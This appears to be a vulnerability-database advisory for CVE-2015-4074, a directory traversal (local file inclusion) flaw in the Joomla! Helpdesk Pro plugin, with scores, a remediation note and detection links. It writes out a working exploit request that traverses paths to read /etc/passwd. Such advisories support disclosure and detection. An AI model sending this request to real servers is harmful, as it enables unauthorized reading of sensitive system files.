🔙 목록으로 돌아가기

CVE-2015-4074: Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion

TitleJoomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read sensitive files on the server.
RemediationUpgrade to Joomla! Helpdesk Pro plugin version 1.4.0 or later to fix the local file inclusion vulnerability.
CVSS Score7.5
EPSS Score0.8582
CVE IDCVE-2015-4074
CWE IDCWE-22
Tags cve2015 cve lfi packetstorm edb joomla plugin helpdesk_pro_project joomla\! xss vkev vuln

🔍 Vulnerability Description

Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.

🌐 HTTP Request

GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-4074.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-4074.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A